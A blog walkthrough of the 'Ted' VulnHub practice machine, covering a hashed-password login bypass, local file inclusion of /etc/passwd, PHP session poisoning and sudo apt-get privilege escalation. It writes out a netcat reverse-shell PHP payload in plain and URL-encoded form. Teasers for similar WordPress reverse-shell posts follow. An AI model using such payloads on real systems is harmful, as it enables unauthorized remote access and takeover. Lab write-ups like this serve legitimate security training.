Ted VULHUB walkthrough (It was fun though)

-

Ted VULHUB walkthrough (It was fun though)


Penetrating Methodology:
Scanning
  • NMAP
Enumeration
  • Browsing the website
  • Burpsuite 
Exploitation
  • Netcat
Privilege Escalation
  • Sudo permission for the apt-get command
Let's Breach the BOX
   I scan the Network with nmap and found the box in 192.168.234.136 IP (that was quick)


Quick nmap scan and  the result was fast with 80 port open with apache 2.4.18 and don't found any interesting thing that could be exploited.so i try surfing the in browser..



I got login form 
     and i quickly check the username and password as admin,root and other possible combination and that doesn't work and i think of intercepting the traffic using burpsuit

The password hash is incorrect.hmmm, seems like it is taking password in hash form and the username is correct..
   I tried some common hash and sha256 works for password as admin (encode the admin in sha256 and go for login )



Opps i got the page and page was reading a file from the browser file system





So, i quickly type /etc/passwd and intercept in burpsuit and got

so i tried for file inclusion to remote file inclusion vulnerability



Let's grap the php session id and exploit the user_pref and then go for php listener code


so,now let's try the php netcat listener

The php code is <?php system("nc 192.168.1.7 1234 -e /bin/bash")?>

Encode this in url

%3c%3fphp%20system%28%22nc%20192.168.1.7%201234%20-e%20%2fbin%2fbash%22%29%3f%3e

and listen as reverse in below figure.



Boom we got a shell and check the id it's www-data (lower shell)
let's do a privelge escaltion



As you can see the apt-get update has root permission without password and this can be use for gain access as root


we got the root permission.


Happy hacking :)

Comments

Post a Comment

Popular posts from this blog

Wordpress Reverse Shell

-
Image
Wordpress Reverse Shell This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already setup WordPress in our windows 7 machine. Table of Content 1) Metasploit Framework 3) Upload PHP reverse shell 4) Getting reverse shell connection Requirement: Host machine: WordPress Attacker machine: Kali Linux WordPress Credential: admin: password Let's begin 1) 1st Method  The site which we are going to test is: i login into the wordpress admin Now i check upload the reverse shell (PHP) using metasploit BOOOOOOM : I got the interactive shell of windows 7 machine Let's breach in another way 2) 2nd Method I have already done login into wordpress using admin and password So, Create a PHP code file using msfvenom Now Go to the Apprereance -> Theme editor -> 404.php templetes past a php code ...
Read more

EVM: 1 Vulnhub Walkthrough

-
Image
Penetration Methodologies: Finding IP Nmap Enumeration Browsing HTTP Service Directory Bruteforce using dirb Enumeration Using WPScan Password Bruteforce using WPScan Getting Login Credentials Exploitation Exploiting using Metasploit  Getting a reverse connection  Spawning a TTY Shell  Enumeration for Root Credentials Privilege Escalation  Getting Login Credentials Logging in as root Reading the Final Flag Let's Breach:     First of all finding IP for the machine i use bridge connection.The IP of machine was 192.168.1.5 I quickly nmap the website found 80 open Then i browse the server and found that apache default page and phpinfo() Nothing interesting then i bruteforce the directory you can use gobuster and nikto also While scan is complete i found a wordpress directory that leads me to an another website Then i quickly browse the http://192.168.1.5/wordpress then i found the page d...
Read more

Chanakya Vulnhub Walkthrough

-
Image
It was the box where you have to have knowledge about using Nmap , dirb or nitko or gobuster ,ftp, ssh and metasploit .In this box we analyze the ftp connection using wireshark and got credentials and after that we gain access shell using ssh and exploit root permission using metasploit. Breaching Process  Finding IP Nmap Enumeration Nmap Deep scan Browsing HTTP service Enumerating directory ftp login Exploitation Generating ssh authorize key Gaining access to shell (ashoka) Reading chrootkit logs (using metasploit) Privilege Escalation chkrootkit Let's Breach  Using nmap we scan the network ip in our network nmap -sn  ip_range (use root permission to scan ) After sanning there are only five ip that was not hard for me to find we are using NAT in virtualbox after finding the ip we go for Enumeration (this is the phase where you have to see every single piece of information) Browsing the ip we get ...
Read more